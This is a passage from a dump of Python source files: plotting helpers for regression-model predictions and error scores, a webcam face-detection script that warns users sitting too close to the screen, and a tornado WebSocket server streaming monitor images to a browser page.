ax.annotate('{0:.1f}'.format(mae), xy=(184.5, y_pos), xytext=(186, y_pos), xycoords='data', annotation_clip=False, fontsize=fontsize*0.65, rotation=270, ha='left', va='center', color=fontcolor, arrowprops=dict( arrowstyle='-[, widthB={0}, lengthB=0.5'.format(1.5*font_scale), # 1.5, 1.5, 3.15, 4.85 lw=0.7, ls=(0, (3, 3)), color=linecolor, alpha=alpha)) last_level = level def get_min_max(df, feat_n, y_col): try: max_pred = df[feat_n].max() except KeyError: feat_n = str(feat_n) max_pred = df[feat_n].max() max_plot = math.ceil(np.nanmax([max_pred, df[y_col].max()])) # max_plot = math.ceil(np.nanmax([5.130879038769381, 6.102534])) min_plot = int(np.nanmin([df[feat_n].min(), df[y_col].min()])) return max_plot, min_plot def plot_meas_pred(feat_n, y_col, df_preds, ax, x_label='Predicted', y_label='Measured', units=None, max_plot=None, min_plot=None, legend='full', fontsize=16, fontcolor='#464646', linecolor='#464646'): ''' Creates a single plot showing measured (y-axis) vs. predicted (x-axis) ``feat_n`` should be the column heading of the predicted values to plot from ``df_preds``. ``feat_n`` is typically an integer for a given number of features, then the column contains the predicted values to plot. 
''' if units is None: units = '' else: units = ' ({0})'.format(units) # markers = dict(V6='P', V8='X', V10='d', V14='8') markers = ('o', 'X', 's', 'P', 'D', '^', 'v', 'p', 'h', 'd', '<', '*', 'H', '8', '>') hue_order = sorted(df_preds['study'].unique()) try: df_preds['date'] = df_preds['date'].dt.date # Be sure date does not include time except AttributeError: pass style_order = sorted(df_preds['date'].unique()) if len(style_order) > 15: style = 'month' df_preds['month'] = pd.DatetimeIndex(df_preds['date']).month_name() style_order = sorted(df_preds['month'].unique()) else: style = 'date' colors = sns.color_palette('pastel', len(hue_order)) if max_plot is None: max_plot, _ = get_min_max(df_preds, feat_n, y_col) if min_plot is None: _, min_plot = get_min_max(df_preds, feat_n, y_col) x_lin = np.linspace(min_plot, max_plot, 2) ax = sns.lineplot(x=x_lin, y=x_lin, color=linecolor, ax=ax, zorder=0.8, linewidth=2) ax.lines[0].set_linestyle('--') ax = sns.scatterplot(x=feat_n, y=y_col, data=df_preds, hue='study', style=style, hue_order=hue_order, style_order=style_order, markers=markers[:len(style_order)], ax=ax, legend=legend, palette=colors) ax.set_ylim([min_plot, max_plot]) ax.set_xlim([min_plot, max_plot]) ax.set_xlabel(x_label + units, fontsize=fontsize, color=fontcolor) ax.set_ylabel(y_label + units, fontsize=fontsize, color=fontcolor) ax.tick_params(labelsize=int(fontsize*0.95), colors=fontcolor) return ax, colors def plot_get_n_models(dir_results, folder_name): ''' Gets the number of models whose data are populated ''' (df_preds_las, df_preds_svr, df_preds_rf, df_preds_pls, df_score_las, df_score_svr, df_score_rf, df_score_pls) =\ load_test_results(os.path.join(dir_results, folder_name), name_append=folder_name.replace('_', '-')) preds_list = [df_preds_las, df_preds_svr, df_preds_rf, df_preds_pls] preds_list_nonnull = [] for item in preds_list: if item is not None: preds_list_nonnull.append(item) score_list = [df_score_las, df_score_svr, df_score_rf, df_score_pls] score_list_nonnull = [] for item in score_list: if item is not None: score_list_nonnull.append(item) n_models = len(preds_list_nonnull) return n_models, preds_list_nonnull, score_list_nonnull def plot_titles(ax, title_text, fontsize=16, fontcolor='white', facecolor='#585858'): ''' Add titles to plots ''' t1 = ax.set_title( title_text, fontsize=fontsize*1.1, fontweight='bold', color=fontcolor, bbox=dict(color=facecolor)) t1.get_bbox_patch().set_boxstyle( 'ext', pad=0.25, width=ax.get_window_extent().width) return t1 def on_resize(event, title_list, axes): for t, ax in zip(title_list, axes): t.get_bbox_patch().set_boxstyle( 'ext', pad=0.2, width=ax.get_window_extent().width) def plot_legend(fig, ax, df_preds, feat_n, colors, study_labels=None, date_labels=None, fontsize=16, handle_color='#464646', handle_size=80, label_color='#464646', ncol=4): study_n = len(df_preds['study'].unique()) # date_n = len(df_preds['date'].unique()) h, l = ax.get_legend_handles_labels() h1 = h[1:study_n+2] h2 = h[study_n+2:] l1 = l[1:study_n+2] l2 = l[study_n+2:] obs_study_labels = [] obs_study_list = [] for study in df_preds['study'].unique(): obs_study_labels.append(study) obs_n = len(df_preds[df_preds['study'] == study]) obs_study_list.append(obs_n) if study_labels is None: study_labels = obs_study_labels.copy() l1[-1] = 'No. 
features: {0}'.format(feat_n) for handle in h2: handle.set_color(handle_color) handle._sizes = [handle_size] h1_new = [] for i in range(len(h1)-1): handle_new = mlines.Line2D([], [], color=colors[i], marker='s', linestyle='None', markersize=10, label=l1[i]) h1_new.append(handle_new) h1_new.append(mlines.Line2D([], [], alpha=0.0, label=l1[-1])) leg = fig.legend(h2 + h1_new, l2 + l1, loc='upper center', bbox_to_anchor=(0.5, 1.0), fontsize=fontsize*0.85, framealpha=0.85, ncol=ncol, handletextpad=0.1, # spacing between handle and label columnspacing=0.5, frameon=True, edgecolor=label_color) for text in leg.get_texts(): text.set_color(label_color) ax.legend().remove() return leg def legend_resize(fig, leg, twinx=False, twinx_right=0.93): ''' Draws canvas so legend and figure size can be determined, then adjusts figure size so it fits well with the figure. ''' fig.canvas.draw() fig.tight_layout() # height_leg = fig.legends[0].get_window_extent().height # we recreated the legend (and made a second legend) # height_fig = fig.get_window_extent().height height_leg = leg.get_window_extent().height # we recreated the legend (and made a second legend) height_fig = fig.get_window_extent().height legend_adjust = (1 - (height_leg / height_fig)) * 0.98 right = twinx_right if twinx is True else 1 fig.tight_layout(rect=[0, 0, right, legend_adjust]) return fig def plot_scores_feats(df, ax, palette, legend, obj='mae', ls_1='-', lw_a=1.5, y_label=None, units=None, fill_std=False, fontsize=16, fontcolor='#464646'): if fill_std is True: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj, 'std_train_' + obj, 'std_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') else: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_train_' + obj].iloc[1] < 0: df_wide[['score_train_' + obj, 'score_test_' + obj]] = df_wide[['score_train_' + obj, 'score_test_' + obj]] * -1 ax = sns.lineplot( data=df_wide[['score_train_' + obj, 'score_test_' + obj]], ax=ax, palette=palette, legend=legend) ax.lines[0].set_linewidth(lw_a) ax.lines[0].set_linestyle(ls_1) ax.lines[1].set_linestyle(ls_1) if y_label is None: y_label = 'Error' if units is None: units = '' else: units = ' ({0})'.format(units) ax.set_ylabel(y_label + units, fontsize=fontsize, color=fontcolor) ax.set_xlabel('Number of features', fontsize=fontsize, color=fontcolor) ax.tick_params(labelsize=fontsize*0.85, colors=fontcolor, labelleft=True) if fill_std is True: x_feats = df_wide.index std_l = df_wide['score_test_' + obj].values - df_wide['std_test_' + obj].values std_u = df_wide['score_test_' + obj].values + df_wide['std_test_' + obj].values ax.fill_between(x_feats, std_l, std_u, facecolor=palette[1], alpha=0.15) return ax def sync_axis_grids(ax, ax2, ax_min=None, ax_max=None, ax2_min=None, ax2_max=None): l = ax.get_ylim() if ax_min is None else (ax_min, ax_max) l2 = ax2.get_ylim() if ax2_min is None else (ax2_min, ax2_max) ax.set_ylim(l) ax2.set_ylim(l2) f = lambda x : l2[0]+(x-l[0])/(l[1]-l[0])*(l2[1]-l2[0]) ticks = f(ax.get_yticks()) ax2.yaxis.set_major_locator(matplotlib.ticker.FixedLocator(ticks)) ax2.yaxis.set_major_formatter(FormatStrFormatter('%.2f')) return ax, ax2 def plot_secondary(df, ax, palette, legend, obj='r2', ls_2='--', lw_b=1, fontsize=16, fontcolor='#464646', fill_std=False): if fill_std is True: df_wide = df[['feat_n', 'score_train_' + obj, 'score_test_' + obj, 'std_train_' + obj, 'std_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') else: df_wide = 
df[['feat_n', 'score_train_' + obj, 'score_test_' + obj]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_train_' + obj].iloc[1] < 0: df_wide[['score_train_' + obj, 'score_test_' + obj]] = df_wide[['score_train_' + obj, 'score_test_' + obj]] * -1 ax2 = ax.twinx() ax2.grid() ax2 = sns.lineplot(data=df_wide[['score_train_' + obj, 'score_test_' + obj]], ax=ax2, palette=palette, legend=legend) ax2.lines[0].set_linewidth(lw_b) ax2.lines[1].set_linewidth(lw_b) ax2.lines[0].set_linestyle(ls_2) ax2.lines[1].set_linestyle(ls_2) ax2.set_ylabel(r'R$^{2}$', fontsize=fontsize, color=fontcolor, rotation=0, labelpad=15) ax2.tick_params(labelsize=fontsize*0.85, colors=fontcolor, labelright=True) ax2.set_yticks(np.linspace(ax2.get_yticks()[0], ax2.get_yticks()[-1], len(ax.get_yticks()))) if fill_std is True: x_feats = df_wide.index std_l = df_wide['score_test_' + obj].values - df_wide['std_test_' + obj].values std_u = df_wide['score_test_' + obj].values + df_wide['std_test_' + obj].values ax2.fill_between(x_feats, std_l, std_u, facecolor=palette[1], alpha=0.15) return ax, ax2 def plot_all_features_single(df, ax, palette, legend, obj1='mae', linewidth=2, linestyle='-'): df_wide = df[['feat_n', 'score_test_' + obj1]].apply(pd.to_numeric).set_index('feat_n') if df_wide['score_test_' + obj1].iloc[1] < 0: df_wide[['score_test_' + obj1]] = df_wide[['score_test_' + obj1]] * -1 x_feats = df_wide.index ax = sns.lineplot(data=df_wide[['score_test_' + obj1]], ax=ax, palette=palette, legend=legend) # ax1b = ax1a.twinx() # ax1b = sns.lineplot(data=df_wide[['score_test_' + obj2]], ax=ax1b, palette=[palette[1]], legend=legend) try: ax.lines[-1].set_linewidth(linewidth) # ax.lines[-2].set_linewidth(linewidth) ax.lines[-1].set_linestyle(linestyle) # ax.lines[-2].set_linestyle(linestyle) except: print('Lines do not exist, may be NaN') return ax def min_max_scores_low(df_scores, obj1='mae', obj2='r2'): min_obj1 = np.min([df_scores['score_train_' + obj1].min(), df_scores['score_test_' + obj1].min()]) max_obj1 = np.max([df_scores['score_train_' + obj1].max(), df_scores['score_test_' + obj1].max()]) min_obj2 = np.min([df_scores['score_train_' + obj2].min(), df_scores['score_test_' + obj2].min()]) max_obj2 = np.max([df_scores['score_train_' + obj2].max(), df_scores['score_test_' + obj2].max()]) return min_obj1, max_obj1, min_obj2, max_obj2 def min_max_scores_high(score_list, obj1, obj2, pct=0.05): min_obj1, max_obj1, min_obj2, max_obj2 = [None] * 4 for df_score in score_list: if min_obj1 is None: min_obj1, max_obj1, min_obj2, max_obj2 = min_max_scores_low( df_score, obj1=obj1, obj2=obj2) else: min_obj1b, max_obj1b, min_obj2b, max_obj2b = min_max_scores_low( df_score, obj1=obj1, obj2=obj2) min_obj1 = min_obj1b if min_obj1b < min_obj1 else min_obj1 max_obj1 = max_obj1b if max_obj1b > max_obj1 else max_obj1 min_obj2 = min_obj2b if min_obj2b < min_obj2 else min_obj2 max_obj2 = max_obj2b if max_obj2b > max_obj2 else max_obj2 coef_obj1 = (max_obj1 - min_obj1) * pct coef_obj2 = (max_obj2 - min_obj2) * pct min_obj1 -= coef_obj1 max_obj1 += coef_obj1 min_obj2 -= coef_obj2 max_obj2 += coef_obj2 return min_obj1, max_obj1, min_obj2, max_obj2 def plot_legend_score(fig, ax2, palette, ls_1='-', ls_2='--', lw_a=1.5, lw_b=1, fontsize=16, handle_color='#464646', label_color='#464646'): h, l = ax2.get_legend_handles_labels() h.insert(0, mpatches.Patch(color=palette[0], label='Training')) h.insert(1, mpatches.Patch(color=palette[1], label='Testing')) l = [r'Training', r'Testing', 'Error', r'R$^{2}$'] h[2].set_linestyle(ls_1) 
h[3].set_linestyle(ls_2) h[2].set_linewidth(lw_a) h[3].set_linewidth(lw_b) h[2].set_color(handle_color) h[3].set_color(handle_color) leg = fig.legend( h, l, loc='upper center', bbox_to_anchor=(0.5, 1.0), fontsize=fontsize*0.75, framealpha=0.85, ncol=4, handletextpad=0.5, # spacing between handle and label columnspacing=1.5, frameon=True, edgecolor=label_color) for text in leg.get_texts(): text.set_color(label_color) ax2.legend().remove() return leg def plot_pred_figure(fname_out, feat_n, df_pred_list, df_score_list, model_list, x_label='Predicted', y_label='Measured', y_col='nup_kgha', units=None, save_plot=True, fontsize=16, fontcolor='#464646', linecolor='#464646', legend_cols=4): ''' Builds an axes for every regression model, then adds them dynamically to the matplotlib figure to be saved feat_n = 9 x_label = r'Predicted Vine N (ppm)' # '(kg ha$^{-1}$)' y_label = r'Measured Vine N (ppm)' y_col = 'value' Parameters: units (``str``): The units to display in the plot's annotated error boxes (e.g., '%' will add the percent symbol after the error value). ''' plt.style.use('seaborn-whitegrid') try: temp = df_pred_list[0][feat_n] temp = None except KeyError: feat_n = str(feat_n) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True) max_plot = None min_plot = None for df_pred in df_pred_list: if max_plot is None: max_plot, min_plot = get_min_max(df_pred, feat_n, y_col) else: max_plot2, min_plot2 = get_min_max(df_pred, feat_n, y_col) max_plot = max_plot2 if max_plot2 > max_plot else max_plot min_plot = min_plot2 if min_plot2 < min_plot else min_plot BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] _ = plot_titles(axes[0], 'Test') for idx, (ax, df_preds, df_scores) in enumerate(zip(axes, df_pred_list, df_score_list)): if df_preds[feat_n].isnull().values.any(): continue legend = 'full' if idx == 0 else False ax, colors = plot_meas_pred( feat_n, y_col, df_preds, ax, x_label=x_label, y_label=y_label, units=units, max_plot=max_plot, min_plot=min_plot, legend=legend) if idx == 0: leg = plot_legend( fig, ax, df_preds, feat_n, colors, handle_color=fontcolor, label_color=fontcolor, ncol=legend_cols) fig = legend_resize(fig, leg) if model_list is None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) best_fit_line( df_preds, feat_n, y_col, ax, fontsize=fontsize*0.75, linecolor=linecolor, fontcolor=fontcolor, xytext=(0.95, 0.05), ha='right', va='bottom') prediction_error_label( df_scores, feat_n, ax, fontsize*0.75, fontcolor, xy=(0.04, 0.94), ha='left', va='top', units=units) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() return None else: return fig def plot_score_figure( fname_out, df_score_list, model_list, y_label=None, units=None, save_plot=True, ls_1='-', ls_2='--', lw_a=1.5, lw_b=1, obj1='mae', obj2='r2', fontsize=16, fontcolor='#464646', linecolor='#464646'): ''' Plot the error for all number of features ''' palette = sns.color_palette("mako_r", 2) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, 
sharey=True) min_obj1, max_obj1, min_obj2, max_obj2 = min_max_scores_high( df_score_list, obj1, obj2) BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] axes2 = [] _ = plot_titles(axes[0], ' ') # idx=0 # ax = axes[idx] # df_scores = df_score_list[idx] for idx, (ax, df_scores) in enumerate(zip(axes, df_score_list)): legend = 'full' if idx == 0 else False ax = plot_scores_feats( df_scores, ax, palette, legend=False, obj=obj1, y_label=y_label, units=units) ax, ax2 = plot_secondary( df_scores, ax, palette, legend=legend, obj=obj2) ax, ax2 = sync_axis_grids(ax, ax2, ax_min=min_obj1, ax_max=max_obj1, ax2_min=min_obj2, ax2_max=max_obj2) if idx == 0: ax.set_xlim([0, df_scores['feat_n'].max()]) ax.xaxis.set_major_locator(MaxNLocator(integer=True)) ax2.tick_params(labelright=False) ax2.yaxis.label.set_visible(False) leg = plot_legend_score( fig, ax2, palette, ls_1=ls_1, ls_2=ls_2, lw_a=lw_a, lw_b=lw_b, fontsize=fontsize, handle_color=fontcolor, label_color=fontcolor) fig = legend_resize(fig, leg, twinx=True) elif idx == len(axes)-1: ax.tick_params(labelleft=False) ax.yaxis.label.set_visible(False) if model_list == None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) axes2.append(ax2) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() return None else: return fig def plot_pred_figure_pp(folder_list_test, dir_out_list_test, feat_n, df_pred_list, df_score_list, model_list, x_label='Predicted', y_label='Measured', y_col='nup_kgha', units=None, save_plot=True, fontsize=16, fontcolor='#464646', linecolor='#464646', legend_cols=4): ''' Builds an axes for every regression model, then adds them dynamically to the matplotlib figure to be saved feat_n = 9 x_label = r'Predicted Vine N (ppm)' # '(kg ha$^{-1}$)' y_label = r'Measured Vine N (ppm)' y_col = 'value' Parameters: units (``str``): The units to display in the plot's annotated error boxes (e.g., '%' will add the percent symbol after the error value). 
''' preds_name = '_'.join( ('preds', folder_list_test[1], folder_list_test[2], str(feat_n).zfill(3) + '-feats.png')) fname_out = os.path.join( dir_out_list_test[3], 'figures', preds_name) plt.style.use('seaborn-whitegrid') try: temp = df_pred_list[0][feat_n] temp = None except KeyError: feat_n = str(feat_n) if save_plot is True: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True, dpi=300) else: fig, axes = plt.subplots(1, len(model_list), figsize=(len(model_list)*5, 5.5), sharex=True, sharey=True) max_plot = None min_plot = None for df_pred in df_pred_list: if max_plot is None: max_plot, min_plot = get_min_max(df_pred, feat_n, y_col) else: max_plot2, min_plot2 = get_min_max(df_pred, feat_n, y_col) max_plot = max_plot2 if max_plot2 > max_plot else max_plot min_plot = min_plot2 if min_plot2 < min_plot else min_plot BoxStyle._style_list['ext'] = ExtendedTextBox title_list = [] _ = plot_titles(axes[0], 'Test') for idx, (ax, df_preds, df_scores) in enumerate(zip(axes, df_pred_list, df_score_list)): if df_preds[feat_n].isnull().values.any(): continue legend = 'full' if idx == 0 else False ax, colors = plot_meas_pred( feat_n, y_col, df_preds, ax, x_label=x_label, y_label=y_label, units=units, max_plot=max_plot, min_plot=min_plot, legend=legend) if idx == 0: leg = plot_legend( fig, ax, df_preds, feat_n, colors, handle_color=fontcolor, label_color=fontcolor, ncol=legend_cols) fig = legend_resize(fig, leg) if model_list is None: t = plot_titles(ax, 'Model {0}'.format(idx)) else: t = plot_titles(ax, str(model_list[idx]).split('(')[0]) title_list.append(t) best_fit_line( df_preds, feat_n, y_col, ax, fontsize=fontsize*0.75, linecolor=linecolor, fontcolor=fontcolor, xytext=(0.95, 0.05), ha='right', va='bottom') prediction_error_label( df_scores, feat_n, ax, fontsize*0.75, fontcolor, xy=(0.04, 0.94), ha='left', va='top', units=units) cid = plt.gcf().canvas.mpl_connect( 'resize_event', lambda event: on_resize(event, title_list, axes)) if save_plot is True: fig.savefig(fname_out, dpi=300) plt.close(fig) fig.clf() else: return fig
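# In[Example usage]
# A minimal, hypothetical sketch (not part of the original module) of how the
# tuning/testing helpers above chain together for one response variable. All
# arguments are assumed to be prepared earlier in the pipeline, and the
# feat_name 'reflectance' is an illustrative placeholder.
def example_test_workflow(dir_results, dir_out_tune, df_test, X1, y1, X1_test,
                          y1_test, feat_n_list):
    from sklearn.linear_model import Lasso
    from sklearn.svm import SVR
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.cross_decomposition import PLSRegression

    model_list = [Lasso(max_iter=5000), SVR(), RandomForestRegressor(),
                  PLSRegression()]
    # Resolve (and create) the output folder tree for this run
    dir_out_list, folder_list = set_up_output_dir(
        dir_results, msi_run_id=0, grid_idx=0, y_label='nup_kgha',
        feat_name='reflectance', test_or_tune='testing')
    # Load the per-model hyperparameter tuning results saved earlier
    df_tune_list, df_params, df_params_mode, df_params_mode_count = \
        load_tuning_results(dir_out_tune, model_list)
    # Test every model at every feature count, then persist the results
    df_pred_list, df_score_list = test_predictions(
        df_test, X1, y1, X1_test, y1_test, model_list, df_tune_list,
        feat_n_list, y_label='nup_kgha')
    save_test_results(dir_out_list[3], df_pred_list, df_score_list, model_list)
    return df_pred_list, df_score_list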
PygameDisplay.py
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 26 12:14:08 2022

@author: nuria

Ideas
#todo
- Add either an off-putting or a cute image to discourage sitting too close
  to the screen
"""
from __future__ import print_function
from WebcamVideoStream import WebcamVideoStream
from threading import Thread
import pygame
import os
import time
import cv2 as cv
import argparse
import ctypes  # An included library with Python install (Windows-only message boxes)

def detectWidth(frame):
    # Returns the pixel width of the last detected face (0 if no face found)
    frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
    frame_gray = cv.equalizeHist(frame_gray)
    faces = face_cascade.detectMultiScale(frame_gray, 1.3, 5)
    width = 0
    for (x, y, w, h) in faces:
        center = (x + w // 2, y + h // 2)
        frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360,
                           (255, 0, 255), 4)
        faceROI = frame_gray[y:y + h, x:x + w]
        # -- In each face, detect eyes
        eyes = eyes_cascade.detectMultiScale(faceROI)
        for (x2, y2, w2, h2) in eyes:
            eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2)
            radius = int(round((w2 + h2) * 0.25))
            frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4)
        width = w
    cv.imshow('Capture - Face detection', frame)
    return width

def Mbox(title, text, style):
    # Windows-only modal message box; blocks until the user dismisses it
    return ctypes.windll.user32.MessageBoxW(0, text, title, style)

def pygame_loop():
    # Full-window red warning screen (currently not called from the main loop)
    pygame.init()
    screen_width = 700
    screen_height = 500
    screen = pygame.display.set_mode((screen_width, screen_height))
    pygame_icon_png = "Eyes.png"  # icon of pygame. Must be 32x32 pixels (currently unused)
    font_30 = pygame.font.SysFont("calibri", 30)
    font_18 = pygame.font.SysFont("calibri", 18)  # was 30, which duplicated font_30

    def write_message(message, color=(0, 0, 0), rectangle=[0, 0],
                      font=font_18, update=True, centered=False):
        mesg = font.render(message, True, color)
        if centered:
            w, h = rectangle
            rectangle = [w - mesg.get_width() / 2, h]
        screen.blit(mesg, rectangle)
        if update:
            pygame.display.update()

    def RedScreen():
        screen.fill((200, 0, 0))
        write_message("you are too close to the screen!",
                      color=(255, 255, 255),
                      rectangle=(screen_width / 2, screen_height / 2),
                      centered=True, font=font_30)

    Open = True
    while Open:
        RedScreen()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                Open = False
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_RETURN:
                    Open = False
    pygame.quit()

parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.')
parser.add_argument('--face_cascade', help='Path to face cascade.',
                    default=cv.data.haarcascades + 'haarcascade_frontalface_default.xml')
parser.add_argument('--eyes_cascade', help='Path to eyes cascade.',
                    default=cv.data.haarcascades + 'haarcascade_eye.xml')
parser.add_argument('--camera', help='Camera device number.', type=int, default=0)
args = parser.parse_args()
face_cascade_name = args.face_cascade
eyes_cascade_name = args.eyes_cascade
face_cascade = cv.CascadeClassifier()
eyes_cascade = cv.CascadeClassifier()
if not face_cascade.load(cv.samples.findFile(face_cascade_name)):
    print('--(!)Error loading face cascade')
    exit(0)
if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)):
    print('--(!)Error loading eyes cascade')
    exit(0)
camera_device = args.camera
vs = WebcamVideoStream(src=camera_device).start()  # was hardcoded to 0, ignoring --camera
stream = cv.VideoCapture(camera_device, cv.CAP_DSHOW)

pygame.init()
screen = pygame.display.set_mode((500, 500))
clock = pygame.time.Clock()

def updateGUI():
    # note: ticks once and returns; wrap in a loop for continuous frame capping
    clock.tick(60)

Thread(target=updateGUI, args=()).start()

toggle = False
timer = 0
while True:
    timeNow = time.time()
    ret, frame = stream.read()
    # frame = vs.read()
    width = detectWidth(frame)
    if width > 180:  # a face wider than ~180 px is treated as "too close"
        print(timeNow - timer)
        if timeNow - timer > 5:
            screen.fill((200, 0, 0))
            Mbox('Your title', 'Your text', 0)  # modal: pauses the loop until closed
            warning = True
    else:
        timer = timeNow
        screen.fill((255, 255, 255))
        warning = False
    pygame.display.flip()
    if cv.waitKey(1) & 0xFF == ord('q'):
        pygame.quit()
        break

stream.release()
cv.destroyAllWindows()
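# A possible refinement (not part of the script above): instead of the raw
# pixel-width threshold, estimate distance with the pinhole-camera model
# distance = focal_length_px * real_face_width / face_width_px. The constants
# FOCAL_LENGTH_PX and REAL_FACE_WIDTH_CM below are assumed calibration values,
# not measured ones.
FOCAL_LENGTH_PX = 600.0    # assumed; calibrate per webcam
REAL_FACE_WIDTH_CM = 15.0  # assumed average face width

def estimate_distance_cm(face_width_px):
    """Rough distance estimate from the detected face width in pixels."""
    if face_width_px <= 0:
        return float('inf')  # no face detected; treat as far away
    return FOCAL_LENGTH_PX * REAL_FACE_WIDTH_CM / face_width_px

# With these assumed constants, the script's width threshold of 180 px
# corresponds to roughly 600 * 15 / 180 = 50 cm from the camera.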
webserver.py
import threading import asyncio import json import base64 try: import tornado.web import tornado.websocket from tornado.log import access_log except ImportError: raise ImportError('To use SDTmonitor, you need to install tornado: \n' '\n > pip install tornado') from srttools.monitor.common import MAX_FEEDS, log def create_index_file(port, max_images=MAX_FEEDS*2): html_string = ''' <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>SRT Quicklook</title> </head> <body> <script type="text/javascript"> window.onload = function() { function init_images(n) { if(n % 2 == 0) { n++; } for(i = 0; i <= n; i++) { var div = document.getElementById("div_" + i.toString()); if(div == null) { var image = new Image(); image.id = "image_" + i.toString(); image.style.width = "100%"; image.src = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; div = document.createElement("DIV"); div.setAttribute("id", "div_" + i.toString()); div.setAttribute("style", "width:50%; float:left;"); div.appendChild(image); document.body.appendChild(div); } } } function set_visibility() { var white_image = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; for(i = 0; i < document.getElementsByTagName("IMG").length; i+=2) { var left = i; var right = i+1; var left_div = document.getElementById("div_" + left.toString()); var right_div = document.getElementById("div_" + right.toString()); var left_image = document.getElementById("image_" + left.toString()); var right_image = document.getElementById("image_" + right.toString()); if(left_image.src == white_image && right_image.src == white_image) { left_image.style.display = "none"; right_image.style.display = "none"; } else { left_image.style.display = "block"; right_image.style.display = "block"; } } } function connect() { var destination = document.location.href; if(destination.startsWith("file")) { destination = "localhost"; } else { destination = document.location.href.split(":")[1] } var ws = new WebSocket("ws:" + destination + ":''' + str(port) + '''/images"); ws.onopen = function() { console.log('Connected') } ws.onmessage = function(message) { var msg = JSON.parse(message.data) init_images(msg.index); var image = document.getElementById("image_" + msg.index.toString()); if(msg.image == "") { image.src = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; } else { image.src = "data:image/png;base64," + msg.image; } set_visibility(); }; ws.onclose = function(e) { console.log('Socket is closed. Reconnect will be attempted in 10 seconds.'); setTimeout(function() { connect(); }, 10000); }; ws.onerror = function(err) { console.error('Socket encountered error. 
Closing socket');
                    ws.close();
                };
            }
            connect();
        }
    </script>
</body>
</html>'''
    with open('index.html', 'w') as fobj:
        print(html_string, file=fobj)

# tornado.httpserver and tornado.ioloop are used below but are not pulled in
# by the imports at the top of this module; import them explicitly
import tornado.httpserver
import tornado.ioloop


class WSHandler(tornado.websocket.WebSocketHandler):

    def initialize(self, connected_clients, images):
        self.connected_clients = connected_clients
        self.images = images

    def check_origin(self, origin):
        # This allows clients that did not send any request to the HTTPHandler
        # previously, i.e.: a client that opens the index.html page instead of
        # accessing it via network
        return True

    def open(self):
        log.info('Got connection from {}'.format(self.request.host_name))
        self.connected_clients.add(self)
        # Send all the images to new clients
        keys = self.images.keys()
        for index in keys:
            self.send_image(index)

    def on_close(self):
        self.connected_clients.remove(self)
        log.info('Client {} disconnected'.format(self.request.host_name))

    def on_message(self, message):
        pass

    def send_image(self, index):
        message = {
            'index': index,
            'image': self.images[index]
        }
        self.write_message(json.dumps(message))


class HTTPHandler(tornado.web.RequestHandler):

    def get(self):
        # Answer the HTTP request with the index.html page
        with open('index.html', 'r') as fobj:
            self.write(fobj.read())


class WebServer(object):

    def __init__(self, extension, port=8080):
        self.extension = extension
        self.port = port
        # Load the current images
        self.images = {}
        for index in range(MAX_FEEDS * 2):
            self._load_image('latest_{}.{}'.format(index, extension))
        self.connected_clients = set()
        self.t = None
        self.started = False
        application = tornado.web.Application([
            (r'/images', WSHandler,
             dict(connected_clients=self.connected_clients, images=self.images)),
            (r'/', HTTPHandler),
            (r'/index.html', HTTPHandler)
        ])

        # Disable default log function, we use custom ones
        def log_function(_):
            pass

        application.log_request = log_function
        self.web_server = tornado.httpserver.HTTPServer(application)
        try:
            self.web_server.listen(self.port)
        except OSError:
            raise OSError('Port {} is already being used, choose a different '
                          'one!'.format(self.port))

    def start(self):
        self._asyncioloop = None
        try:
            asyncio.get_event_loop()
        except RuntimeError:
            self._asyncioloop = asyncio.new_event_loop()
            asyncio.set_event_loop(self._asyncioloop)
        self.ioloop = tornado.ioloop.IOLoop.current()
        create_index_file(self.port)
        self.t = threading.Thread(target=self.ioloop.start)
        self.t.start()
        self.started = True

    def stop(self):
        if self.started:
            self.ioloop.add_callback(self.ioloop.stop)
            if self._asyncioloop:
                self._asyncioloop.stop()
            if self.t:
                self.t.join()
            self.started = False

    def _load_image(self, image_file):
        index = int(image_file.split('_')[1].split('.')[0])
        try:
            image_string = base64.b64encode(open(image_file, 'rb').read())
            image_string = image_string.decode('utf-8')
        except IOError:
            image_string = ''
        self.images[index] = image_string
        return index, image_string

    def update(self, image_file):
        # Update the image in memory before sending it
        index, image_string = self._load_image(image_file)
        clients = self.connected_clients
        for client in clients:
